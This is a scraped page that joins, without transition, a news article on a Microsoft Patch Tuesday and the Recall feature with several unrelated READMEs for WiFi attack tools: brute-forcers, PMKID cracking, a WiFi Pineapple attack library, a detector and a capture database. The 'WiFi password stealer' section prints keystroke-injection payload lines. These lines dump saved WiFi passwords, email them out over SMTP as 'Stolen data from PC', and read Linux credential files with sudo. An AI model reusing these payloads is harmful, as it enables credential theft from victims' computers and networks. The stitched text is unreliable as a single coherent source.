Microsoft today released updates to fix more than 50 security vulnerabilities in Windows and related software, a relatively light Patch Tuesday this month for Windows users. The software giant also responded to a torrent of negative feedback on a new feature of Redmondβs flagship operating system that constantly takes screenshots of whatever users are doing on their computers, saying the feature would no longer be enabled by default.
Last month, Microsoft debuted Copilot+ PCs, an AI-enabled version of Windows. Copilot+ ships with a feature nobody asked for that Redmond has aptly dubbed Recall, which constantly takes screenshots of what the user is doing on their PC. Security experts roundly trashed Recall as a fancy keylogger, noting that it would be a gold mine of information for attackers if the userβs PC was compromised with malware.
Microsoft countered that Recall snapshots never leave the userβs system, and that even if attackers managed to hack a Copilot+ PC they would not be able to exfiltrate on-device Recall data. But that claim rang hollow after former Microsoft threat analyst Kevin Beaumont detailed on his blog how any user on the system (even a non-administrator) can export Recall data, which is just stored in an SQLite database locally.
βIβm not being hyperbolic when I say this is the dumbest cybersecurity move in a decade,β Beaumont said on Mastodon.
In a recent Risky Business podcast, host Patrick Gray noted that the screenshots created and indexed by Recall would be a boon to any attacker who suddenly finds himself in an unfamiliar environment.
βThe first thing you want to do when you get on a machine if youβre up to no good is to figure out how someone did their job,β Gray said. βWe saw that in the case of the SWIFT attacks against central banks years ago. Attackers had to do screen recordings to figure out how transfers work. And this could speed up that sort of discovery process.β
Responding to the withering criticism of Recall, Microsoft said last week that it will no longer be enabled by default on Copilot+ PCs.
Only one of the patches released today β CVE-2024-30080 β earned Microsoftβs most urgent βcriticalβ rating, meaning malware or malcontents could exploit the vulnerability to remotely seize control over a userβs system, without any user interaction.
CVE-2024-30080 is a flaw in the Microsoft Message Queuing (MSMQ) service that can allow attackers to execute code of their choosing. Microsoft says exploitation of this weakness is likely, enough to encourage users to disable the vulnerable component if updating isnβt possible in the short run. CVE-2024-30080 has been assigned a CVSS vulnerability score of 9.8 (10 is the worst).
Kevin Breen, senior director of threat research at Immersive Labs, said a saving grace is that MSMQ is not a default service on Windows.
βA Shodan search for MSMQ reveals there are a few thousand potentially internet-facing MSSQ servers that could be vulnerable to zero-day attacks if not patched quickly,β Breen said.
CVE-2024-30078 is a remote code execution weakness in the Windows WiFi Driver, which also has a CVSS score of 9.8. According to Microsoft, an unauthenticated attacker could exploit this bug by sending a malicious data packet to anyone else on the same network β meaning this flaw assumes the attacker has access to the local network.
Microsoft also fixed a number of serious security issues with its Office applications, including at least two remote-code execution flaws, said Adam Barnett, lead software engineer at Rapid7.
βCVE-2024-30101 is a vulnerability in Outlook; although the Preview Pane is a vector, the user must subsequently perform unspecified specific actions to trigger the vulnerability and the attacker must win a race condition,β Barnett said. βCVE-2024-30104 does not have the Preview Pane as a vector, but nevertheless ends up with a slightly higher CVSS base score of 7.8, since exploitation relies solely on the user opening a malicious file.β
Separately, Adobe released security updates for Acrobat, ColdFusion, and Photoshop, among others.
As usual, the SANS Internet Storm Center has the skinny on the individual patches released today, indexed by severity, exploitability and urgency. Windows admins should also keep an eye on AskWoody.com, which often publishes early reports of any Windows patches gone awry.
WinFiHack is a recreational attempt by me to rewrite my previous project Brute-Hacking-Framework's main wifi hacking script that uses netsh and native Windows scripts to create a wifi bruteforcer. This is in no way a fast script nor a superior way of doing the same hack but it needs no external libraries and just Python and python scripts.
The packages are minimal or nearly none π . The package install command is:
pip install rich pyfiglet
Thats it.
So listing the features:
rich
.So this is how the bruteforcer works:
Provide Interface:
The user is required to provide the network interface for the tool to use.
By default, the interface is set to Wi-Fi
.
Search and Set Target:
The user must search for and select the target network.
During this process, the tool performs the following sub-steps:
Input Password File:
The user inputs the path to the password file.
The default path for the password file is ./wordlist/default.txt
.
Run the Attack:
With the target set and the password file ready, the tool is now prepared to initiate the attack.
Attack Procedure:
After installing all the packages just run python main.py
rest is history π make sure you run this on Windows cause this won't work on any other OS. The interface looks like this:
For contributions: - First Clone: First Clone the repo into your dev env and do the edits. - Comments: I would apprtiate if you could add comments explaining your POV and also explaining the upgrade. - Submit: Submit a PR for me to verify the changes and apprive it if necessary.
Airgorah
is a WiFi auditing software that can discover the clients connected to an access point, perform deauthentication attacks against specific clients or all the clients connected to it, capture WPA handshakes, and crack the password of the access point.
It is written in Rust and uses GTK4 for the graphical part. The software is mainly based on aircrack-ng tools suite.
β Don't forget to put a star if you like the project!
This software only works on linux
and requires root
privileges to run.
You will also need a wireless network card that supports monitor mode
and packet injection
.
The installation instructions are available here.
The documentation about the usage of the application is available here.
This project is released under MIT license.
If you have any question about the usage of the application, do not hesitate to open a discussion
If you want to report a bug or provide a feature, do not hesitate to open an issue or submit a pull request
This program is a tool written in Python to recover the pre-shared key of a WPA2 WiFi network without any de-authentication or requiring any clients to be on the network. It targets the weakness of certain access points advertising the PMKID value in EAPOL message 1.
python pmkidcracker.py -s <SSID> -ap <APMAC> -c <CLIENTMAC> -p <PMKID> -w <WORDLIST> -t <THREADS(Optional)>
NOTE: apmac, clientmac, pmkid must be a hexstring, e.g b8621f50edd9
The two main formulas to obtain a PMKID are as follows:
This is just for understanding, both are already implemented in find_pw_chunk
and calculate_pmkid
.
Below are the steps to obtain the PMKID manually by inspecting the packets in WireShark.
*You may use Hcxtools or Bettercap to quickly obtain the PMKID without the below steps. The manual way is for understanding.
To obtain the PMKID manually from wireshark, put your wireless antenna in monitor mode, start capturing all packets with airodump-ng or similar tools. Then connect to the AP using an invalid password to capture the EAPOL 1 handshake message. Follow the next 3 steps to obtain the fields needed for the arguments.
Open the pcap in WireShark:
wlan_rsna_eapol.keydes.msgnr == 1
in WireShark to display only EAPOL message 1 packets.If access point is vulnerable, you should see the PMKID value like the below screenshot:
This tool is for educational and testing purposes only. Do not use it to exploit the vulnerability on any network that you do not own or have permission to test. The authors of this script are not responsible for any misuse or damage caused by its use.
Have you ever watched a film where a hacker would plug-in, seemingly ordinary, USB drive into a victim's computer and steal data from it? - A proper wet dream for some.
Disclaimer: All content in this project is intended for security research purpose only.
Β
During the summer of 2022, I decided to do exactly that, to build a device that will allow me to steal data from a victim's computer. So, how does one deploy malware and exfiltrate data? In the following text I will explain all of the necessary steps, theory and nuances when it comes to building your own keystroke injection tool. While this project/tutorial focuses on WiFi passwords, payload code could easily be altered to do something more nefarious. You are only limited by your imagination (and your technical skills).
After creating pico-ducky, you only need to copy the modified payload (adjusted for your SMTP details for Windows exploit and/or adjusted for the Linux password and a USB drive name) to the RPi Pico.
Physical access to victim's computer.
Unlocked victim's computer.
Victim's computer has to have an internet access in order to send the stolen data using SMTP for the exfiltration over a network medium.
Knowledge of victim's computer password for the Linux exploit.
Note:
It is possible to build this tool using Rubber Ducky, but keep in mind that RPi Pico costs about $4.00 and the Rubber Ducky costs $80.00.
However, while pico-ducky is a good and budget-friedly solution, Rubber Ducky does offer things like stealthiness and usage of the lastest DuckyScript version.
In order to use Ducky Script to write the payload on your RPi Pico you first need to convert it to a pico-ducky. Follow these simple steps in order to create pico-ducky.
Keystroke injection tool, once connected to a host machine, executes malicious commands by running code that mimics keystrokes entered by a user. While it looks like a USB drive, it acts like a keyboard that types in a preprogrammed payload. Tools like Rubber Ducky can type over 1,000 words per minute. Once created, anyone with physical access can deploy this payload with ease.
The payload uses STRING
command processes keystroke for injection. It accepts one or more alphanumeric/punctuation characters and will type the remainder of the line exactly as-is into the target machine. The ENTER
/SPACE
will simulate a press of keyboard keys.
We use DELAY
command to temporarily pause execution of the payload. This is useful when a payload needs to wait for an element such as a Command Line to load. Delay is useful when used at the very beginning when a new USB device is connected to a targeted computer. Initially, the computer must complete a set of actions before it can begin accepting input commands. In the case of HIDs setup time is very short. In most cases, it takes a fraction of a second, because the drivers are built-in. However, in some instances, a slower PC may take longer to recognize the pico-ducky. The general advice is to adjust the delay time according to your target.
Data exfiltration is an unauthorized transfer of data from a computer/device. Once the data is collected, adversary can package it to avoid detection while sending data over the network, using encryption or compression. Two most common way of exfiltration are:
This approach was used for the Windows exploit. The whole payload can be seen here.
This approach was used for the Linux exploit. The whole payload can be seen here.
In order to use the Windows payload (payload1.dd
), you don't need to connect any jumper wire between pins.
Once passwords have been exported to the .txt
file, payload will send the data to the appointed email using Yahoo SMTP. For more detailed instructions visit a following link. Also, the payload template needs to be updated with your SMTP information, meaning that you need to update RECEIVER_EMAIL
, SENDER_EMAIL
and yours email PASSWORD
. In addition, you could also update the body and the subject of the email.
STRING Send-MailMessage -To 'RECEIVER_EMAIL' -from 'SENDER_EMAIL' -Subject "Stolen data from PC" -Body "Exploited data is stored in the attachment." -Attachments .\wifi_pass.txt -SmtpServer 'smtp.mail.yahoo.com' -Credential $(New-Object System.Management.Automation.PSCredential -ArgumentList 'SENDER_EMAIL', $('PASSWORD' | ConvertTo-SecureString -AsPlainText -Force)) -UseSsl -Port 587 |
ο Note:
After sending data over the email, the
.txt
file is deleted.You can also use some an SMTP from another email provider, but you should be mindful of SMTP server and port number you will write in the payload.
Keep in mind that some networks could be blocking usage of an unknown SMTP at the firewall.
In order to use the Linux payload (payload2.dd
) you need to connect a jumper wire between GND
and GPIO5
in order to comply with the code in code.py
on your RPi Pico. For more information about how to setup multiple payloads on your RPi Pico visit this link.
Once passwords have been exported from the computer, data will be saved to the appointed USB flash drive. In order for this payload to function properly, it needs to be updated with the correct name of your USB drive, meaning you will need to replace USBSTICK
with the name of your USB drive in two places.
STRING echo -e "Wireless_Network_Name Password\n--------------------- --------" > /media/$(hostname)/USBSTICK/wifi_pass.txt |
STRING done >> /media/$(hostname)/USBSTICK/wifi_pass.txt |
In addition, you will also need to update the Linux PASSWORD
in the payload in three places. As stated above, in order for this exploit to be successful, you will need to know the victim's Linux machine password, which makes this attack less plausible.
STRING echo PASSWORD | sudo -S echo |
STRING do echo -e "$(sudo <<< PASSWORD cat "$FILE" | grep -oP '(?<=ssid=).*') \t\t\t\t $(sudo <<< PASSWORD cat "$FILE" | grep -oP '(?<=psk=).*')" |
In order to run the wifi_passwords_print.sh
script you will need to update the script with the correct name of your USB stick after which you can type in the following command in your terminal:
echo PASSWORD | sudo -S sh wifi_passwords_print.sh USBSTICK
where PASSWORD
is your account's password and USBSTICK
is the name for your USB device.
NetworkManager is based on the concept of connection profiles, and it uses plugins for reading/writing data. It uses .ini-style
keyfile format and stores network configuration profiles. The keyfile is a plugin that supports all the connection types and capabilities that NetworkManager has. The files are located in /etc/NetworkManager/system-connections/. Based on the keyfile format, the payload uses the grep
command with regex in order to extract data of interest. For file filtering, a modified positive lookbehind assertion was used ((?<=keyword)
). While the positive lookbehind assertion will match at a certain position in the string, sc. at a position right after the keyword without making that text itself part of the match, the regex (?<=keyword).*
will match any text after the keyword. This allows the payload to match the values after SSID and psk (pre-shared key) keywords.
For more information about NetworkManager here is some useful links:
Below is an example of the exfiltrated and formatted data from a victim's machine in a .txt
file.
WiFi-password-stealer/resources/wifi_pass.txt
Lines 1 to 5 in f5b3b11
Wireless_Network_Name Password | |
--------------------- -------- | |
WLAN1 pass1 | |
WLAN2 pass2 | |
WLAN3 pass3 |
One of the advantages of Rubber Ducky over RPi Pico is that it doesn't show up as a USB mass storage device once plugged in. Once plugged into the computer, all the machine sees it as a USB keyboard. This isn't a default behavior for the RPi Pico. If you want to prevent your RPi Pico from showing up as a USB mass storage device when plugged in, you need to connect a jumper wire between pin 18 (GND
) and pin 20 (GPIO15
). For more details visit this link.
ο‘ Tip:
- Upload your payload to RPi Pico before you connect the pins.
- Don't solder the pins because you will probably want to change/update the payload at some point.
When creating a functioning payload file, you can use the writer.py
script, or you can manually change the template file. In order to run the script successfully you will need to pass, in addition to the script file name, a name of the OS (windows or linux) and the name of the payload file (e.q. payload1.dd). Below you can find an example how to run the writer script when creating a Windows payload.
python3 writer.py windows payload1.dd
This pico-ducky currently works only on Windows OS.
This attack requires physical access to an unlocked device in order to be successfully deployed.
The Linux exploit is far less likely to be successful, because in order to succeed, you not only need physical access to an unlocked device, you also need to know the admins password for the Linux machine.
Machine's firewall or network's firewall may prevent stolen data from being sent over the network medium.
Payload delays could be inadequate due to varying speeds of different computers used to deploy an attack.
The pico-ducky device isn't really stealthy, actually it's quite the opposite, it's really bulky especially if you solder the pins.
Also, the pico-ducky device is noticeably slower compared to the Rubber Ducky running the same script.
If the Caps Lock
is ON, some of the payload code will not be executed and the exploit will fail.
If the computer has a non-English Environment set, this exploit won't be successful.
Currently, pico-ducky doesn't support DuckyScript 3.0, only DuckyScript 1.0 can be used. If you need the 3.0 version you will have to use the Rubber Ducky.
Caps Lock
bug.sudo
.Author:: TW-D
Version:: 1.3.7
Copyright:: Copyright (c) 2022 TW-D
License:: Distributes under the same terms as Ruby
Doc:: https://hak5.github.io/mk7-docs/docs/rest/rest/
Requires:: Ruby >= 2.7.0p0 and Pineapple Mark VII >= 2.1.0-stable
Installation (Debian, Ubuntu, Raspbian)::
sudo apt-get install build-essential curl g++ ruby ruby-dev
sudo gem install net-ssh rest-client tty-progressbar
Library allowing the automation of active or passive attack operations.
Note : "Issues" and "Pull Request" are welcome.
In "./payloads/" directory, you will find :
COMMAND and CONTROL | Author | Usage |
---|---|---|
Hak5 Key Croc - Real-time recovery of keystrokes from a keyboard | TW-D | (edit) ruby ./hak5_key-croc.rb |
Maltronics WiFi Deauther - Spam beacon frames | TW-D | (edit) ruby ./maltronics_wifi-deauther.rb |
DEFENSE | Author | Usage |
---|---|---|
Hak5 Pineapple Spotter | TW-D with special thanks to @DrSKiZZ, @cribb-it, @barry99705 and @dark_pyrro | (edit) ruby ./hak5-pineapple_spotter.rb |
DoS | Author | Usage |
---|---|---|
Deauthentication of clients available on the access points | TW-D | (edit) ruby ./deauthentication-clients.rb |
EXPLOITATION | Author | Usage |
---|---|---|
Evil WPA Access Point | TW-D | (edit) ruby ./evil-wpa_access-point.rb |
Fake Access Points | TW-D | (edit) ruby ./fake_access-points.rb |
Mass Handshakes | TW-D | (edit) ruby ./mass-handshakes.rb |
Rogue Access Points | TW-D | (edit) ruby ./rogue_access-points.rb |
Twin Access Points | TW-D | (edit) ruby ./twin_access-points.rb |
GENERAL | Author | Usage |
---|---|---|
System Status, Disk Usage, ... | TW-D | (edit) ruby ./dashboard-stats.rb |
Networking Interfaces | TW-D | (edit) ruby ./networking-interfaces.rb |
System Logs | TW-D | (edit) ruby ./system-logs.rb |
RECON | Author | Usage |
---|---|---|
Access Points and Clients on 2.4GHz and 5GHz (with a supported adapter) | TW-D | (edit) ruby ./access-points_clients_5ghz.rb |
Access Points and Clients | TW-D | (edit) ruby ./access-points_clients.rb |
MAC Addresses of Access Points | TW-D | (edit) ruby ./access-points_mac-addresses.rb |
Tagged Parameters of Access Points | TW-D | (edit) ruby ./access-points_tagged-parameters.rb |
Access Points and Wireless Network Mapping with WiGLE | TW-D | (edit) ruby ./access-points_wigle.rb |
MAC Addresses of Clients | TW-D | (edit) ruby ./clients_mac-addresses.rb |
OPEN Access Points | TW-D | (edit) ruby ./open_access-points.rb |
WEP Access Points | TW-D | (edit) ruby ./wep_access-points.rb |
WPA Access Points | TW-D | (edit) ruby ./wpa_access-points.rb |
WPA2 Access Points | TW-D | (edit) ruby ./wpa2_access-points.rb |
WPA3 Access Points | TW-D | (edit) ruby ./wpa3_access-points.rb |
WARDRIVING | Author | Usage |
---|---|---|
Continuous Recon on 2.4GHz and 5GHz (with a supported adapter) | TW-D | (edit) ruby ./continuous-recon_5ghz.rb [CTRL+c] |
Continuous Recon for Handshakes Capture | TW-D | (edit) ruby ./continuous-recon_handshakes.rb [CTRL+c] |
Continuous Recon | TW-D | (edit) ruby ./continuous-recon.rb [CTRL+c] |
#
# Title: <TITLE>
#
# Description: <DESCRIPTION>
#
#
# Author: <AUTHOR>
# Version: <VERSION>
# Category: <CATEGORY>
#
# STATUS
# ======================
# <SHORT-DESCRIPTION> ... SETUP
# <SHORT-DESCRIPTION> ... ATTACK
# <SHORT-DESCRIPTION> ... SPECIAL
# <SHORT-DESCRIPTION> ... FINISH
# <SHORT-DESCRIPTION> ... CLEANUP
# <SHORT-DESCRIPTION> ... OFF
#
require_relative('<PATH-TO>/classes/PineappleMK7.rb')
system_authentication = PineappleMK7::System::Authentication.new
system_authentication.host = "<PINEAPPLE-IP-ADDRESS>"
system_authentication.port = 1471
system_authentication.mac = "<PINEAPPLE-MAC-ADDRESS>"
system_authentication.password = "<ROOT-ACCOUNT-PASSWORD>"
if (system_authentication.login)
led = PineappleMK7::System::LED.new
# SETUP
#
led.setup
#
# [...]
#
# ATTACK
#
led.attack
#
# [...]
#
# SPECIAL
#
led.special
#
# [...]
#
# FINISH
#
led.finish
#
# [...]
#
# CLEANUP
#
led.cleanup
#
# [...]
#
# OFF
#
led.off
end
Note : Don't hesitate to take inspiration from the payloads directory.
system_authentication = PineappleMK7::System::Authentication.new
system_authentication.host = (string) "<PINEAPPLE-IP-ADDRESS>"
system_authentication.port = (integer) 1471
system_authentication.mac = (string) "<PINEAPPLE-MAC-ADDRESS>"
system_authentication.password = (string) "<ROOT-ACCOUNT-PASSWORD>"
system_authentication.login()
led = PineappleMK7::System::LED.new
led.setup()
led.failed()
led.attack()
led.special()
led.cleanup()
led.finish()
led.off()
dashboard_notifications = PineappleMK7::Modules::Dashboard::Notifications.new
dashboard_notifications.clear()
dashboard_stats = PineappleMK7::Modules::Dashboard::Stats.new
dashboard_stats.output()
logging_system = PineappleMK7::Modules::Logging::System.new
logging_system.output()
pineap_clients = PineappleMK7::Modules::PineAP::Clients.new
pineap_clients.connected_clients()
pineap_clients.previous_clients()
pineap_clients.kick( (string) mac )
pineap_clients.clear_previous()
evil_wpa = PineappleMK7::Modules::PineAP::EvilWPA.new
evil_wpa.ssid = (string default:'PineAP_WPA')
evil_wpa.bssid = (string default:'00:13:37:BE:EF:00')
evil_wpa.auth = (string default:'psk2+ccmp')
evil_wpa.password = (string default:'pineapplesareyummy')
evil_wpa.hidden = (boolean default:false)
evil_wpa.enabled = (boolean default:false)
evil_wpa.capture_handshakes = (boolean default:false)
evil_wpa.save()
pineap_filtering = PineappleMK7::Modules::PineAP::Filtering.new
pineap_filtering.client_filter( (string) 'allow' | 'deny' )
pineap_filtering.add_client( (string) mac )
pineap_filtering.clear_clients()
pineap_filtering.ssid_filter( (string) 'allow' | 'deny' )
pineap_impersonation = PineappleMK7::Modules::PineAP::Impersonation.new
pineap_impersonation.output()
pineap_impersonation.add_ssid( (string) ssid )
pineap_impersonation.clear_pool()
open_ap = PineappleMK7::Modules::PineAP::OpenAP.new
open_ap.output()
pineap_settings = PineappleMK7::Modules::PineAP::Settings.new
pineap_settings.enablePineAP = (boolean default:true)
pineap_settings.autostartPineAP = (boolean default:true)
pineap_settings.armedPineAP = (boolean default:false)
pineap_settings.ap_channel = (string default:'11')
pineap_settings.karma = (boolean default:false)
pineap_settings.logging = (boolean default:false)
pineap_settings.connect_notifications = (boolean default:false)
pineap_settings.disconnect_notifications = (boolean default:false)
pineap_settings.capture_ssids = (boolean default:false)
pineap_settings.beacon_responses = (boolean default:false)
pineap_settings.broadcast_ssid_pool = (boolean default:false)
pineap_settings.broadcast_ssid_pool_random = (boolean default:false)
pineap_settings.pineap_mac = (string default:system_authentication.mac)
pineap_settings.target_mac = (string default:'FF:FF:FF:FF:FF:FF')< br/>pineap_settings.beacon_response_interval = (string default:'NORMAL')
pineap_settings.beacon_interval = (string default:'NORMAL')
pineap_settings.save()
recon_handshakes = PineappleMK7::Modules::Recon::Handshakes.new
recon_handshakes.start( (object) ap )
recon_handshakes.stop()
recon_handshakes.output()
recon_handshakes.download( (object) handshake, (string) destination )
recon_handshakes.clear()
recon_scanning = PineappleMK7::Modules::Recon::Scanning.new
recon_scanning.start( (integer) scan_time )
recon_scanning.start_continuous( (boolean) autoHandshake )
recon_scanning.stop_continuous()
recon_scanning.output( (integer) scanID )
recon_scanning.tags( (object) ap )
recon_scanning.deauth_ap( (object) ap )
recon_scanning.delete( (integer) scanID )
settings_networking = PineappleMK7::Modules::Settings::Networking.new
settings_networking.interfaces()
settings_networking.client_scan( (string) interface )
settings_networking.client_connect( (object) network, (string) interface )
settings_networking.client_disconnect( (string) interface )
settings_networking.recon_interface( (string) interface )
Pinacolada looks for typical IEEE 802.11 attacks and then informs you about them as quickly as possible. All this with the help of Hak5's WiFi Coconut, which allows it to listen for threats on all 14 channels in the 2.4GHz range simultaneously.
Attack | Type | Status |
---|---|---|
Deauthentication | DoS | β
|
Disassociation | DoS | β
|
Authentication | DoS | β
|
EvilTwin | MiTM | ο |
KARMA | MiTM | ο |
pip install flask
brew install wireshark
pip install flask
apt install tshark
For both operating systems install the WiFi Coconut's userspace
# Download Pinacolada
git clone https://github.com/90N45-d3v/Pinacolada
cd Pinacolada
# Start Pinacolada
python main.py
Pinacolada will be accessible from your browser at 127.0.0.1:8888
.
The default password is CoconutsAreYummy
.
After you have logged in, you can see a dashboard on the start page and you should change the password in the settings tab.
If configured, Pinacolada will alert you to attacks via E-Mail. In order to send you an E-Mail, however, an E-Mail account for Pinacolada must be specified in the settings tab. To find the necessary information such as SMTP server and SMTP port, search the internet for your mail provider and how their SMTP servers are configured + how to use them. Here are some information about known providers:
Provider | SMTP Server | SMTP Port (TLS) |
---|---|---|
Gmail | smtp.gmail.com | 587 |
Outlook | smtp.office365.com | 587 |
GoDaddy | smtpout.secureserver.net | 587 |
Since I don't own a WiFi Coconut myself, I have to simulate their traffic. So if you encounter any problems, don't hesitate to contact me and open an issue.
Script to parse Aircrack-ng captures into a SQLite database and extract useful information like handshakes (in 22000 hashcat format), MGT identities, interesting relations between APs, clients and it's Probes, WPS information and a global view of all the APs seen.
_ __ _ _ _
__ __(_) / _|(_) __| || |__
\ \ /\ / /| || |_ | | / _` || '_ \
\ V V / | || _|| | | (_| || |_) |
\_/\_/ |_||_| |_| _____ \__,_||_.__/
|_____|
by r4ulcl
docker pull r4ulcl/wifi_db
Dependencies:
sudo apt install tshark
sudo apt install python3 python3-pip
git clone https://github.com/ZerBea/hcxtools.git
cd hcxtools
make
sudo make install
cd ..
Installation
git clone https://github.com/r4ulcl/wifi_db
cd wifi_db
pip3 install -r requirements.txt
Dependencies:
sudo pacman -S wireshark-qt
sudo pacman -S python-pip python
git clone https://github.com/ZerBea/hcxtools.git
cd hcxtools
make
sudo make install
cd ..
Installation
git clone https://github.com/r4ulcl/wifi_db
cd wifi_db
pip3 install -r requirements.txt
Run airodump-ng saving the output with -w:
sudo airodump-ng wlan0mon -w scan --manufacturer --wps --gpsd
#Folder with captures
CAPTURESFOLDER=/home/user/wifi
# Output database
touch db.SQLITE
docker run -t -v $PWD/db.SQLITE:/db.SQLITE -v $CAPTURESFOLDER:/captures/ r4ulcl/wifi_db
-v $PWD/db.SQLITE:/db.SQLITE
: To save de output in current folder db.SQLITE file-v $CAPTURESFOLDER:/captures/
: To share the folder with the captures with the dockerOnce the capture is created, we can create the database by importing the capture. To do this, put the name of the capture without format.
python3 wifi_db.py scan-01
In the event that we have multiple captures we can load the folder in which they are directly. And with -d we can rename the output database.
python3 wifi_db.py -d database.sqlite scan-folder
The database can be open with:
Below is an example of a ProbeClientsConnected table.
usage: wifi_db.py [-h] [-v] [--debug] [-o] [-t LAT] [-n LON] [--source [{aircrack-ng,kismet,wigle}]] [-d DATABASE] capture [capture ...]
positional arguments:
capture capture folder or file with extensions .csv, .kismet.csv, .kismet.netxml, or .log.csv. If no extension is provided, all types will
be added. This option supports the use of wildcards (*) to select multiple files or folders.
options:
-h, --help show this help message and exit
-v, --verbose increase output verbosity
--debug increase output verbosity to debug
-o, --obfuscated Obfuscate MAC and BSSID with AA:BB:CC:XX:XX:XX-defghi (WARNING: replace all database)
-t LAT, --lat LAT insert a fake lat in the new elements
-n LON, --lon LON insert a fake lon i n the new elements
--source [{aircrack-ng,kismet,wigle}]
source from capture data (default: aircrack-ng)
-d DATABASE, --database DATABASE
output database, if exist append to the given database (default name: db.SQLITE)
TODO
TODO
wifi_db contains several tables to store information related to wireless network traffic captured by airodump-ng. The tables are as follows:
AP
: This table stores information about the access points (APs) detected during the captures, including their MAC address (bssid
), network name (ssid
), whether the network is cloaked (cloaked
), manufacturer (manuf
), channel (channel
), frequency (frequency
), carrier (carrier
), encryption type (encryption
), and total packets received from this AP (packetsTotal
). The table uses the MAC address as a primary key.
Client
: This table stores information about the wireless clients detected during the captures, including their MAC address (mac
), network name (ssid
), manufacturer (manuf
), device type (type
), and total packets received from this client (packetsTotal
). The table uses the MAC address as a primary key.
SeenClient
: This table stores information about the clients seen during the captures, including their MAC address (mac
), time of detection (time
), tool used to capture the data (tool
), signal strength (signal_rssi
), latitude (lat
), longitude (lon
), altitude (alt
). The table uses the combination of MAC address and detection time as a primary key, and has a foreign key relationship with the Client
table.
Connected
: This table stores information about the wireless clients that are connected to an access point, including the MAC address of the access point (bssid
) and the client (mac
). The table uses a combination of access point and client MAC addresses as a primary key, and has foreign key relationships with both the AP
and Client
tables.
WPS
: This table stores information about access points that have Wi-Fi Protected Setup (WPS) enabled, including their MAC address (bssid
), network name (wlan_ssid
), WPS version (wps_version
), device name (wps_device_name
), model name (wps_model_name
), model number (wps_model_number
), configuration methods (wps_config_methods
), and keypad configuration methods (wps_config_methods_keypad
). The table uses the MAC address as a primary key, and has a foreign key relationship with the AP
table.
SeenAp
: This table stores information about the access points seen during the captures, including their MAC address (bssid
), time of detection (time
), tool used to capture the data (tool
), signal strength (signal_rssi
), latitude (lat
), longitude (lon
), altitude (alt
), and timestamp (bsstimestamp
). The table uses the combination of access point MAC address and detection time as a primary key, and has a foreign key relationship with the AP
table.
Probe
: This table stores information about the probes sent by clients, including the client MAC address (mac
), network name (ssid
), and time of probe (time
). The table uses a combination of client MAC address and network name as a primary key, and has a foreign key relationship with the Client
table.
Handshake
: This table stores information about the handshakes captured during the captures, including the MAC address of the access point (bssid
), the client (mac
), the file name (file
), and the hashcat format (hashcat
). The table uses a combination of access point and client MAC addresses, and file name as a primary key, and has foreign key relationships with both the AP
and Client
tables.
Identity
: This table represents EAP (Extensible Authentication Protocol) identities and methods used in wireless authentication. The bssid
and mac
fields are foreign keys that reference the AP
and Client
tables, respectively. Other fields include the identity and method used in the authentication process.
ProbeClients
: This view selects the MAC address of the probe, the manufacturer and type of the client device, the total number of packets transmitted by the client, and the SSID of the probe. It joins the Probe
and Client
tables on the MAC address and orders the results by SSID.
ConnectedAP
: This view selects the BSSID of the connected access point, the SSID of the access point, the MAC address of the connected client device, and the manufacturer of the client device. It joins the Connected
, AP
, and Client
tables on the BSSID and MAC address, respectively, and orders the results by BSSID.
ProbeClientsConnected
: This view selects the BSSID and SSID of the connected access point, the MAC address of the probe, the manufacturer and type of the client device, the total number of packets transmitted by the client, and the SSID of the probe. It joins the Probe
, Client
, and ConnectedAP
tables on the MAC address of the probe, and filters the results to exclude probes that are connected to the same SSID that they are probing. The results are ordered by the SSID of the probe.
HandshakeAP
: This view selects the BSSID of the access point, the SSID of the access point, the MAC address of the client device that performed the handshake, the manufacturer of the client device, the file containing the handshake, and the hashcat output. It joins the Handshake
, AP
, and Client
tables on the BSSID and MAC address, respectively, and orders the results by BSSID.
HandshakeAPUnique
: This view selects the BSSID of the access point, the SSID of the access point, the MAC address of the client device that performed the handshake, the manufacturer of the client device, the file containing the handshake, and the hashcat output. It joins the Handshake
, AP
, and Client
tables on the BSSID and MAC address, respectively, and filters the results to exclude handshakes that were not cracked by hashcat. The results are grouped by SSID and ordered by BSSID.
IdentityAP
: This view selects the BSSID of the access point, the SSID of the access point, the MAC address of the client device that performed the identity request, the manufacturer of the client device, the identity string, and the method used for the identity request. It joins the Identity
, AP
, and Client
tables on the BSSID and MAC address, respectively, and orders the results by BSSID.
SummaryAP
: This view selects the SSID, the count of access points broadcasting the SSID, the encryption type, the manufacturer of the access point, and whether the SSID is cloaked. It groups the results by SSID and orders them by the count of access points in descending order.
Aircrack-ng
All in 1 file (and separately)
Kismet
Wigle
install
parse all files in folder -f --folder
Fix Extended errors, tildes, etc (fixed in aircrack-ng 1.6)
Support bash multi files: "capture*-1*"
Script to delete client or AP from DB (mac). - (Whitelist)
Whitelist to don't add mac to DB (file whitelist.txt, add macs, create DB)
Overwrite if there is new info (old ESSID='', New ESSID='WIFI')
Table Handhsakes and PMKID
Hashcat hash format 22000
Table files, if file exists skip (full path)
Get HTTP POST passwords
DNS querys
This program is a continuation of a part of: https://github.com/T1GR3S/airo-heat
GNU General Public License v3.0